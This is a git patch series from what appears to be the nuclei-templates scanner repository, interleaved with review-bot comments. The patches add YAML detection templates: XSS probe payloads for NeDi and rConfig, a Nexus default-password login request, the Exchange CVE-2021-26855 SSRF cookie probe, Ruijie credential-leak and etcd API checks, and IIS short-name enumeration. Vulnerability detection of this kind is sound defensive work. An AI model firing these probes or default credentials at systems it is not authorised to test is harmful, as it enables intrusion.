 exposures/configs/exposed-hg.yaml | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/exposures/configs/exposed-hg.yaml b/exposures/configs/exposed-hg.yaml
index eb1cdf46bd..9f0e619a3b 100644
--- a/exposures/configs/exposed-hg.yaml
+++ b/exposures/configs/exposed-hg.yaml
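Review bot: The new template has no `tags:` entry, while the other CVE templates in this series carry one (for example `tags: cve,cve2020,nedi,xss`); add `  tags: cve,cve2015,jetty` under `info` so it is selectable by tag. The `Referer: "\x00"` header relies on YAML double-quote `\x` escaping to produce a real NUL byte, which is easy to break by "normalising" to single quotes — a one-line comment above it such as `# double quotes required: \x00 must decode to a NUL byte` would protect that.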
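Review bot: The id is corrected to `microsoft-exchange-server-detect`, but the file keeps the misspelt path `technologies/microsoft-echange-server-detect.yaml`, so id and file name now disagree; rename the file in the same change so the two stay in step, as every other template in the repository does.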
@@ -10,6 +10,7 @@ requests:
     path:
       - "{{BaseURL}}/.hg/hgrc"
 
+    matchers-condition: and
     matchers:
       - type: word
         words:
@@ -19,4 +20,4 @@ requests:
 
       - type: status
         status:
-          - 200
\ No newline at end of file
+          - 200
From bf60c4b7e7ef09368caad7fdb96ad7e6ee2d0e14 Mon Sep 17 00:00:00 2001
From: Prince Chaddha
Date: Sun, 7 Mar 2021 16:49:03 +0530
Subject: [PATCH 283/370] Update CVE-2015-2080.yaml

---
 cves/2015/CVE-2015-2080.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/cves/2015/CVE-2015-2080.yaml b/cves/2015/CVE-2015-2080.yaml
index 4e23cc8275..ca7268eef5 100644
--- a/cves/2015/CVE-2015-2080.yaml
+++ b/cves/2015/CVE-2015-2080.yaml
@@ -23,4 +23,4 @@ requests:
       - type: word
         words:
           - "Illegal character 0x0 in state"
-        part: header
+        part: body
From a43828d0be7a6ed17bc7c05c071214531c7e5fa1 Mon Sep 17 00:00:00 2001
From: Prince Chaddha
Date: Sun, 7 Mar 2021 17:32:25 +0530
Subject: [PATCH 284/370] Update nexus-default-password.yaml

---
 .../nexus/nexus-default-password.yaml | 26 ++++++++++++-------
 1 file changed, 16 insertions(+), 10 deletions(-)

diff --git a/default-logins/nexus/nexus-default-password.yaml b/default-logins/nexus/nexus-default-password.yaml
index e4b30a3931..aecb665d44 100644
--- a/default-logins/nexus/nexus-default-password.yaml
+++ b/default-logins/nexus/nexus-default-password.yaml
@@ -2,24 +2,30 @@ id: nexus-default-password info: name: Nexus Default Password - author: pdteam - severity: low + author: pikpikcu + severity: high tags: nexus,dlogin requests: - - method: GET - path: - - "{{BaseURL}}/service/local/authentication/login" - headers: - Content-Type: application/json - Authorization: "Basic YWRtaW46YWRtaW4xMjM=" + - raw: + - | + POST /service/rapture/session HTTP/1.1 + Host: {{Hostname}} + Content-Length: 43 + X-Nexus-UI: true + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + Connection: close + + username=YWRtaW4%3D&password=YWRtaW4xMjM%3D matchers-condition: and matchers: - type: status status: - - 200 + - 204 - type: word words: - - "loggedIn" + - "Server: Nexus" + - "NXSESSIONID" + part: header condition: and From c78596cd76ce11002e57247aaf08e9f4c463f6aa Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sun, 7 Mar 2021 12:03:40 +0000 Subject: [PATCH 285/370] Auto Update README [Sun Mar 7 12:03:40 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 4d2fbb620f..5939adcbe8 100644 --- a/README.md +++ b/README.md @@ -39,11 +39,11 @@ An overview of the nuclei template directory including number of templates assoc | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ | | cves | 229 | vulnerabilities | 105 | exposed-panels | 100 | | exposures | 60 | technologies | 50 | misconfiguration | 50 | -| workflows | 23 | miscellaneous | 16 | default-logins | 17 | +| workflows | 23 | miscellaneous | 16 | default-logins | 18 | | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**71 directories, 685 files**. +**72 directories, 686 files**. From 2f328cecd24cc3ed26aa172917166ce2831f86b5 Mon Sep 17 00:00:00 2001 
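Review bot: The raw request hard-codes `Content-Length: 43`; it matches today's 43-byte body, but it will silently become wrong the moment the body is edited, and as far as I know nuclei computes Content-Length for raw requests itself, so the line can simply be dropped. `author: pdteam` is also replaced rather than extended, whereas the series' convention for edits is to append (compare `author: pd-team & daffainfo & meme-lord` in phpinfo.yaml); `author: pdteam,pikpikcu` keeps the history.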
From: sandeep <8293321+ehsandeep@users.noreply.github.com>
Date: Sun, 7 Mar 2021 18:50:45 +0530
Subject: [PATCH 286/370] Added gitlab-snippets

---
 misconfiguration/gitlab-snippets.yaml | 21 +++++++++++++++++++++
 1 file changed, 21 insertions(+)
 create mode 100644 misconfiguration/gitlab-snippets.yaml

diff --git a/misconfiguration/gitlab-snippets.yaml b/misconfiguration/gitlab-snippets.yaml
new file mode 100644
index 0000000000..b3253b81a2
--- /dev/null
+++ b/misconfiguration/gitlab-snippets.yaml
@@ -0,0 +1,21 @@
+id: gitlab-snippets
+info:
+  name: GitLab public snippets
+  author: pdteam
+  severity: info
+  reference: https://gist.github.com/vysecurity/20311c29d879e0aba9dcffbe72a88b10
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/explore/snippets"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - 'Snippets · Explore · GitLab'
+
+      - type: status
+        status:
+          - 200
\ No newline at end of file
From f5b7aaa824548fb5b449243ed3747cce573f24cd Mon Sep 17 00:00:00 2001
From: GitHub Action
Date: Sun, 7 Mar 2021 13:21:09 +0000
Subject: [PATCH 287/370] Auto Update README [Sun Mar 7 13:21:09 UTC 2021] :robot:

---
 README.md | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/README.md b/README.md
index 4d2fbb620f..c3a46ee5ac 100644
--- a/README.md
+++ b/README.md
@@ -38,12 +38,12 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ | | cves | 229 | vulnerabilities | 105 | exposed-panels | 100 | -| exposures | 60 | technologies | 50 | misconfiguration | 50 | +| exposures | 60 | technologies | 50 | misconfiguration | 51 | | workflows | 23 | miscellaneous | 16 | default-logins | 17 | | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**71 directories, 685 files**. +**71 directories, 686 files**. From 0d75d24bd968981842e95772585823e60c33c635 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sun, 7 Mar 2021 13:22:21 +0000 Subject: [PATCH 288/370] Auto Update README [Sun Mar 7 13:22:21 UTC 2021] :robot: --- README.md | 8 +++++--- 1 file changed, 5 insertions(+), 3 deletions(-) diff --git a/README.md b/README.md index 3680df7028..11188aebd6 100644 --- a/README.md +++ b/README.md @@ -35,13 +35,15 @@ An overview of the nuclei template directory including number of templates assoc
-======= -| exposures | 60 | technologies | 50 | misconfiguration | 50 | +| Templates | Counts | Templates | Counts | Templates | Counts | +| -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ | +| cves | 229 | vulnerabilities | 105 | exposed-panels | 100 | +| exposures | 60 | technologies | 50 | misconfiguration | 51 | | workflows | 23 | miscellaneous | 16 | default-logins | 18 | | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**72 directories, 686 files**. +**72 directories, 687 files**.
From f13243b7438962da737219402753b71648ef7552 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sun, 7 Mar 2021 19:16:30 +0530 Subject: [PATCH 289/370] Create unauthenticated-mongo-express.yaml --- .../unauthenticated-mongo-express.yaml | 22 +++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 misconfiguration/unauthenticated-mongo-express.yaml diff --git a/misconfiguration/unauthenticated-mongo-express.yaml b/misconfiguration/unauthenticated-mongo-express.yaml new file mode 100644 index 0000000000..14ab9922a9 --- /dev/null +++ b/misconfiguration/unauthenticated-mongo-express.yaml @@ -0,0 +1,22 @@ +id: unauthenticated-mongo-express.yaml + +info: + name: Mongo Express Unauthenticated + author: dhiyaneshDK + severity: high + reference: https://www.exploit-db.com/ghdb/5684 + +requests: + - method: GET + path: + - '{{BaseURL}}' + - '{{BaseURL}}/mongo-express/' + + matchers-condition: and + matchers: + - type: word + words: + - 'Home - Mongo Express' + - type: status + status: + - 200 From e4c22f147ea981298bdf2b6295ff7e6b104ee042 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sun, 7 Mar 2021 19:16:57 +0530 Subject: [PATCH 290/370] Create solr-query-dashboard.yaml --- misconfiguration/solr-query-dashboard.yaml | 22 ++++++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 misconfiguration/solr-query-dashboard.yaml diff --git a/misconfiguration/solr-query-dashboard.yaml b/misconfiguration/solr-query-dashboard.yaml new file mode 100644 index 0000000000..f5524980c6 --- /dev/null +++ b/misconfiguration/solr-query-dashboard.yaml @@ -0,0 +1,22 @@ +id: solr-admin-query + +info: + name: Solr Admin Query Page + author: dhiyaneshDK + severity: High + reference: https://www.exploit-db.com/ghdb/5856 + +requests: + - method: GET + path: + - '{{BaseURL}}/admin/' + - '{{BaseURL}}/solr/admin/' + + matchers-condition: and + matchers: + - type: word + words: + - 'Solr admin page' + - type: status + status: + - 200 
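Review bot: `id: unauthenticated-mongo-express.yaml` carries the file extension, unlike every other template id in this series (`solr-admin-query`, `oki-data-corporation`, `wso2-management-console`); it should read `id: unauthenticated-mongo-express` so the id matches the file name and stays consistent. The template also has no `tags:` entry.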
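Review bot: `severity: High` is capitalised while every other template in the series writes `severity: high`; if severity parsing is case-sensitive this template would either fail to load or be reported under an unknown severity, so change it to `  severity: high`. The id `solr-admin-query` also does not match the file name `solr-query-dashboard.yaml`; one of the two should be renamed.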
From 331650749c5425b976c238d1597180bf52de952e Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sun, 7 Mar 2021 19:17:41 +0530 Subject: [PATCH 291/370] Create oki-data.yaml --- exposed-panels/oki-data.yaml | 21 +++++++++++++++++++++ 1 file changed, 21 insertions(+) create mode 100644 exposed-panels/oki-data.yaml diff --git a/exposed-panels/oki-data.yaml b/exposed-panels/oki-data.yaml new file mode 100644 index 0000000000..43bd50169e --- /dev/null +++ b/exposed-panels/oki-data.yaml @@ -0,0 +1,21 @@ +id: oki-data-corporation + +info: + name: Oki Data Corporation + author: dhiyaneshDK + severity: info + reference: https://www.exploit-db.com/ghdb/5937 + +requests: + - method: GET + path: + - '{{BaseURL}}/status.htm' + + matchers-condition: and + matchers: + - type: word + words: + - 'Oki Data Corporation' + - type: status + status: + - 200 From 32ff7b6cf9fbc0b64bafbc42c1645c9e86de115f Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sun, 7 Mar 2021 19:18:07 +0530 Subject: [PATCH 292/370] Create weatherlink.yaml --- exposed-panels/weatherlink.yaml | 21 +++++++++++++++++++++ 1 file changed, 21 insertions(+) create mode 100644 exposed-panels/weatherlink.yaml diff --git a/exposed-panels/weatherlink.yaml b/exposed-panels/weatherlink.yaml new file mode 100644 index 0000000000..b946732f7b --- /dev/null +++ b/exposed-panels/weatherlink.yaml @@ -0,0 +1,21 @@ +id: weatherlink-configuration + +info: + name: WeatherLinkIP Configuration + author: dhiyaneshDK + severity: info + reference: https://www.exploit-db.com/ghdb/6007 + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + words: + - 'WeatherLinkIP Configuration' + - type: status + status: + - 200 From 4516189b45e551c552fff0b3e19e725e000031cb Mon Sep 17 00:00:00 2001 
From: Dhiyaneshwaran Date: Sun, 7 Mar 2021 19:18:25 +0530 Subject: [PATCH 293/370] Create wso2-management-console.yaml --- exposed-panels/wso2-management-console.yaml | 21 +++++++++++++++++++++ 1 file changed, 21 insertions(+) create mode 100644 exposed-panels/wso2-management-console.yaml diff --git a/exposed-panels/wso2-management-console.yaml b/exposed-panels/wso2-management-console.yaml new file mode 100644 index 0000000000..e149d890d9 --- /dev/null +++ b/exposed-panels/wso2-management-console.yaml @@ -0,0 +1,21 @@ +id: wso2-management-console + +info: + name: WSO2 Management Console + author: dhiyaneshDK + severity: info + reference: https://www.exploit-db.com/ghdb/5691 + +requests: + - method: GET + path: + - '{{BaseURL}}/carbon/admin/login.jsp' + + matchers-condition: and + matchers: + - type: word + words: + - 'WSO2 Management Console' + - type: status + status: + - 200 From 20dc853b06a487d9d13caaf8949ad0254681745d Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Mon, 8 Mar 2021 05:28:55 +0000 Subject: [PATCH 294/370] Create CVE-2020-14413.yaml --- cves/2020/CVE-2020-14413.yaml | 26 ++++++++++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 cves/2020/CVE-2020-14413.yaml diff --git a/cves/2020/CVE-2020-14413.yaml b/cves/2020/CVE-2020-14413.yaml new file mode 100644 index 0000000000..02f0fa97eb --- /dev/null +++ b/cves/2020/CVE-2020-14413.yaml @@ -0,0 +1,26 @@ +id: CVE-2020-14413 + +info: + name: NeDi 1.9C XSS + author: pikpikcu + severity: medium + reference: https://nvd.nist.gov/vuln/detail/CVE-2020-14413 + tags: cve,cve2020,nedi,xss + +requests: + - method: GET + path: + - '{{BaseURL}}/Devices-Config.php?sta=">' + + matchers-condition: and + matchers: + + - type: word + words: + - "
" + part: body + condition: and + + - type: status + status: + - 200 From 5aa25c7c9c224f85d280bd4b9cb2009921aabcd7 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Mon, 8 Mar 2021 05:36:37 +0000 Subject: [PATCH 295/370] Create CVE-2020-12256.yaml --- cves/2020/CVE-2020-12256.yaml | 26 ++++++++++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 cves/2020/CVE-2020-12256.yaml diff --git a/cves/2020/CVE-2020-12256.yaml b/cves/2020/CVE-2020-12256.yaml new file mode 100644 index 0000000000..2387a01575 --- /dev/null +++ b/cves/2020/CVE-2020-12256.yaml @@ -0,0 +1,26 @@ +id: CVE-2020-12256 + +info: + name: rConfig 3.9.4 XSS + author: pikpikcu + severity: medium + reference: https://nvd.nist.gov/vuln/detail/CVE-2020-12256 + tags: cve,cve2020,rconfig,xss + +requests: + - method: GET + path: + - '{{BaseURL}}/devicemgmt.php?deviceId=">' + + matchers-condition: and + matchers: + + - type: word + words: + - "" + part: body + condition: and + + - type: status + status: + - 200 From 8278e02051596c60643d021ec82ffb2af677a7f0 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Mon, 8 Mar 2021 05:38:54 +0000 Subject: [PATCH 296/370] Create CVE-2020-12259.yaml --- cves/2020/CVE-2020-12259.yaml | 26 ++++++++++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 cves/2020/CVE-2020-12259.yaml diff --git a/cves/2020/CVE-2020-12259.yaml b/cves/2020/CVE-2020-12259.yaml new file mode 100644 index 0000000000..f85d3541d9 --- /dev/null +++ b/cves/2020/CVE-2020-12259.yaml 
@@ -0,0 +1,26 @@ +id: CVE-2020-12259 + +info: + name: rConfig 3.9.4 XSS + author: pikpikcu + severity: medium + reference: https://nvd.nist.gov/vuln/detail/CVE-2020-12259 + tags: cve,cve2020,rconfig,xss + +requests: + - method: GET + path: + - '{{BaseURL}}/configDevice.php?rid=">' + + matchers-condition: and + matchers: + + - type: word + words: + - "" + part: body + condition: and + + - type: status + status: + - 200 From 290aaefa3949217de1eeb6aa07bc557c1d60e918 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Mon, 8 Mar 2021 05:43:56 +0000 Subject: [PATCH 297/370] Create CVE-2020-12258.yaml --- cves/2020/CVE-2020-12258.yaml | 26 ++++++++++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 cves/2020/CVE-2020-12258.yaml diff --git a/cves/2020/CVE-2020-12258.yaml b/cves/2020/CVE-2020-12258.yaml new file mode 100644 index 0000000000..094fac6275 --- /dev/null +++ b/cves/2020/CVE-2020-12258.yaml @@ -0,0 +1,26 @@ +id: CVE-2020-12258 + +info: + name: rConfig 3.9.4 XSS + author: pikpikcu + severity: medium + reference: https://nvd.nist.gov/vuln/detail/CVE-2020-12258 + tags: cve,cve2020,rconfig,xss + +requests: + - method: GET + path: + - '{{BaseURL}}/configDevice.php?rid=">' + + matchers-condition: and + matchers: + + - type: word + words: + - "" + part: body + condition: and + + - type: status + status: + - 200 From c633c33bde52ff687f86600343558a3a73e5d5d5 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Mon, 8 Mar 2021 05:49:44 +0000 Subject: [PATCH 298/370] Update CVE-2020-12258.yaml --- cves/2020/CVE-2020-12258.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2020/CVE-2020-12258.yaml b/cves/2020/CVE-2020-12258.yaml index 094fac6275..7b0a9099b8 100644 --- a/cves/2020/CVE-2020-12258.yaml +++ b/cves/2020/CVE-2020-12258.yaml @@ -17,7 +17,7 @@ requests: - type: word words: - - "" + - '' part: body condition: and 
From 0c761a2e85db2254208dc6b9a0b01b297091d547 Mon Sep 17 00:00:00 2001 From: aron Date: Mon, 8 Mar 2021 08:55:22 +0100 Subject: [PATCH 299/370] No need for internet connection and leak to burp --- cves/2021/CVE-2021-26855.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/cves/2021/CVE-2021-26855.yaml b/cves/2021/CVE-2021-26855.yaml index f07e465fe3..c3a2c484bd 100644 --- a/cves/2021/CVE-2021-26855.yaml +++ b/cves/2021/CVE-2021-26855.yaml @@ -19,7 +19,7 @@ requests: GET /owa/auth/x.js HTTP/1.1 Host: {{Hostname}} User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 - Cookie: X-AnonResource=true; X-AnonResource-Backend=burpcollaborator.net/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3; + Cookie: X-AnonResource=true; X-AnonResource-Backend=localhost/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3; Accept-Language: en Connection: close @@ -27,8 +27,8 @@ requests: matchers: - type: status status: - - 200 + - 500 - type: word words: - - "Burp Collaborator Server" + - "localhost" part: body \ No newline at end of file From 3c01c4df562e8c13e288152bdda92b35ebf0ebe3 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Mon, 8 Mar 2021 13:43:06 +0530 Subject: [PATCH 300/370] minor fix --- cves/2021/CVE-2021-26855.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2021/CVE-2021-26855.yaml b/cves/2021/CVE-2021-26855.yaml index c3a2c484bd..a4e6519d6b 100644 --- a/cves/2021/CVE-2021-26855.yaml +++ b/cves/2021/CVE-2021-26855.yaml @@ -30,5 +30,5 @@ requests: - 500 - type: word words: - - "localhost" - part: body \ No newline at end of file + - 'X-Calculatedbetarget: localhost' + part: header \ No newline at end of file From f3cf303c448309909cc13e1059d2acc0fa101425 Mon Sep 17 00:00:00 2001 
From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Mon, 8 Mar 2021 11:11:49 +0000 Subject: [PATCH 301/370] Create ruijie-information-disclosure.yaml --- .../ruijie-information-disclosure.yaml | 26 +++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 exposures/configs/ruijie-information-disclosure.yaml diff --git a/exposures/configs/ruijie-information-disclosure.yaml b/exposures/configs/ruijie-information-disclosure.yaml new file mode 100644 index 0000000000..fd38ffb599 --- /dev/null +++ b/exposures/configs/ruijie-information-disclosure.yaml @@ -0,0 +1,26 @@ +id: ruijie-information-disclosure + +info: + name: Ruijie Information Disclosure + author: pikpikcu + severity: high + reference: https://www.cnblogs.com/cHr1s/p/14499858.html + tags: ruijie + +requests: + - method: GET + path: + - '{{BaseURL}}/login.php' + + matchers-condition: and + matchers: + + - type: regex + regex: + - '"role":"super_admin","name":"(.*)","password":"(.*)"' + part: body + condition: and + + - type: status + status: + - 200 From 9e52f250c57d7a6a2c07abd186cb1e8a33496363 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 8 Mar 2021 13:37:21 +0000 Subject: [PATCH 302/370] Auto Update README [Mon Mar 8 13:37:21 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 11188aebd6..a051f87d11 100644 --- a/README.md +++ b/README.md 
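Review bot: `condition: and` on a matcher that holds a single regex has no effect and should be dropped. The two `(.*)` groups are greedy and, on a minified JSON body, run to the last `"` of the line; since this is a matcher rather than an extractor the groups are never used, so `'"role":"super_admin","name":"[^"]*","password":"[^"]*"'` is both cheaper and clearer about what is being asserted.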
@@ -38,12 +38,12 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ | | cves | 229 | vulnerabilities | 105 | exposed-panels | 100 | -| exposures | 60 | technologies | 50 | misconfiguration | 51 | +| exposures | 61 | technologies | 50 | misconfiguration | 51 | | workflows | 23 | miscellaneous | 16 | default-logins | 18 | | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**72 directories, 687 files**. +**72 directories, 688 files**. From cfc743d23a6ffc21ab81a11f011530e242d6a94a Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 8 Mar 2021 13:58:14 +0000 Subject: [PATCH 303/370] Auto Update README [Mon Mar 8 13:58:14 UTC 2021] :robot: --- README.md | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/README.md b/README.md index a051f87d11..58743a810d 100644 --- a/README.md +++ b/README.md @@ -37,13 +37,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ | -| cves | 229 | vulnerabilities | 105 | exposed-panels | 100 | -| exposures | 61 | technologies | 50 | misconfiguration | 51 | +| cves | 229 | vulnerabilities | 105 | exposed-panels | 103 | +| exposures | 61 | technologies | 50 | misconfiguration | 53 | | workflows | 23 | miscellaneous | 16 | default-logins | 18 | | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**72 directories, 688 files**. +**72 directories, 693 files**. From 3f840d07830a93f07e22e790289ef01435bf758a Mon Sep 17 00:00:00 2001 
From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Mon, 8 Mar 2021 19:41:41 +0530 Subject: [PATCH 304/370] minor update --- cves/2021/CVE-2021-26855.yaml | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/cves/2021/CVE-2021-26855.yaml b/cves/2021/CVE-2021-26855.yaml index a4e6519d6b..f5df4f2484 100644 --- a/cves/2021/CVE-2021-26855.yaml +++ b/cves/2021/CVE-2021-26855.yaml @@ -19,7 +19,7 @@ requests: GET /owa/auth/x.js HTTP/1.1 Host: {{Hostname}} User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 - Cookie: X-AnonResource=true; X-AnonResource-Backend=localhost/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3; + Cookie: X-AnonResource=true; X-AnonResource-Backend=somethingnonexistent/ecp/default.flt?~3; X-BEResource=somethingnonexistent/owa/auth/logon.aspx?~3; Accept-Language: en Connection: close @@ -28,7 +28,9 @@ requests: - type: status status: - 500 + - 503 + - type: word words: - - 'X-Calculatedbetarget: localhost' + - 'X-Calculatedbetarget: somethingnonexistent' part: header \ No newline at end of file From d04f74714714b92b95c99bd4a84532524c021c64 Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Mon, 8 Mar 2021 16:17:59 +0200 Subject: [PATCH 305/370] Spelling mistake in the parameter --- cves/2021/CVE-2021-3019.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-3019.yaml b/cves/2021/CVE-2021-3019.yaml index 03762eb81a..c16c9e1c5f 100644 --- a/cves/2021/CVE-2021-3019.yaml +++ b/cves/2021/CVE-2021-3019.yaml @@ -4,7 +4,7 @@ info: name: Lanproxy Directory Traversal author: pikpikcu severity: medium - refrence: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3019 + reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3019 tags: cve,cve2021,lanproxy,traversal requests: From 22d8c537149a78b9f760414d54a2261dd3728b04 Mon Sep 17 00:00:00 2001 
From: Dhiyaneshwaran
Date: Tue, 9 Mar 2021 01:38:32 +0530
Subject: [PATCH 306/370] Create http-etcd-unauthenticated-api-data-leak.yaml

---
 ...tp-etcd-unauthenticated-api-data-leak.yaml | 21 +++++++++++++++++++
 1 file changed, 21 insertions(+)
 create mode 100644 misconfiguration/http-etcd-unauthenticated-api-data-leak.yaml

diff --git a/misconfiguration/http-etcd-unauthenticated-api-data-leak.yaml b/misconfiguration/http-etcd-unauthenticated-api-data-leak.yaml
new file mode 100644
index 0000000000..8fc195ec40
--- /dev/null
+++ b/misconfiguration/http-etcd-unauthenticated-api-data-leak.yaml
@@ -0,0 +1,21 @@
+id: http-etcd-unauthenticated-api-data-leak
+
+info:
+  name: etcd Unauthenticated HTTP API Leak
+  author: dhiyaneshDk
+  severity: high
+  reference: https://hackerone.com/reports/1088429
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}:2379/v2/auth/roles"
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - '"role"'
+        part: body
+      - type: status
+        status:
+          - 200
From 8fcaf1d6c08d85cbe308bd363ed4a95b736da563 Mon Sep 17 00:00:00 2001
From: sandeep <8293321+ehsandeep@users.noreply.github.com>
Date: Tue, 9 Mar 2021 13:42:02 +0530
Subject: [PATCH 307/370] fixing syntax

---
 fuzzing/iis-shortname.yaml | 51 +++++++++++++++++++++++++++++---------
 1 file changed, 39 insertions(+), 12 deletions(-)

diff --git a/fuzzing/iis-shortname.yaml b/fuzzing/iis-shortname.yaml
index 92c0ff9be2..1a2db42b20 100644
--- a/fuzzing/iis-shortname.yaml
+++ b/fuzzing/iis-shortname.yaml
@@ -4,20 +4,47 @@ info: author: nodauf severity: info description: If IIS use old .Net Framwork it's possible to enumeration folder with the symbol ~. - - # References: - # - https://github.com/lijiejie/IIS_shortname_Scanner - # - https://www.exploit-db.com/exploits/19525 + reference: | + - https://github.com/lijiejie/IIS_shortname_Scanner + - https://www.exploit-db.com/exploits/19525 requests: - - method: GET - path: - - "{{BaseURL}}/N0t4xist*~1*/a.aspx" - - "{{BaseURL}}/*~1*/a.aspx'" - - method: OPTIONS - path: - - "{{BaseURL}}/N0t4xist*~1*/a.aspx" - - "{{BaseURL}}/*~1*/a.aspx'" + - raw: + - | + GET /N0t4xist*~1*/a.aspx HTTP/1.1 + Host: {{Hostname}} + Origin: {{BaseURL}} + Connection: close + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 + Accept-Language: en-US,en;q=0.9 + + - | + GET /*~1*/a.aspx' HTTP/1.1 + Host: {{Hostname}} + Origin: {{BaseURL}} + Connection: close + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 + Accept-Language: en-US,en;q=0.9 + + - | + OPTIONS /N0t4xist*~1*/a.aspx HTTP/1.1 + Host: {{Hostname}} + Origin: {{BaseURL}} + Connection: close + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 + Accept-Language: en-US,en;q=0.9 + + - | + OPTIONS /*~1*/a.aspx' HTTP/1.1 + Host: {{Hostname}} + Origin: {{BaseURL}} + Connection: close + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 + Accept-Language: en-US,en;q=0.9 matchers: - type: dsl 
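Review bot: The four raw requests repeat the same seven header lines and differ only in method and path; as far as I can tell the `User-Agent`, `Accept`, `Accept-Language` and `Origin` headers play no part in the `~1` short-name probe, so each request could be reduced to the request line, `Host: {{Hostname}}` and `Connection: close`, which would make the one intended difference between them visible at a glance. `reference: |` again produces a string with embedded `- ` bullets rather than a list (same point as PATCH 279). The `description` context line with `Framwork` and `enumeration folder` is not touched by this change. The `matchers:` block at the end of the hunk continues outside it.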
